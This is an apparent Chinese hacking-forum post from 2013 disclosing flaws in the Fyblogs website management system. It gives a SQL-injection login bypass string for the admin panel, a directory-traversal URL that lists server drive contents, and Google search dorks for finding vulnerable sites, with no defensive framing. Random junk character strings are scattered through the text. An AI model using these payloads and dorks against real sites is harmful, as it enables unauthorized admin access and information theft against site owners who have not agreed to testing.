中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:17
标题:
Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
- c$ d8 s; ^% p# k
2 _. N* G2 Q4 k6 A! V+ E7 i
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
5 }5 v/ U! v: {8 f/ P, h
admin/uploadfile.asp?currentFolder=/upfiles/../
" X z/ O0 T2 ]! F
9 a" m4 l% Q+ b9 k% H: w
漏洞证明:
6 m, i3 Q* p; h! c
7 i( {! z% |* q2 x# K0 C
谷歌:inurl:type.asp?id=1 新闻中心
- ?) [ Z( c3 \$ R% F8 L
或者 :inurl:download_ok.asp?
! _% i& v W; u
E% \) _ Z8 ~) p$ A' g
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2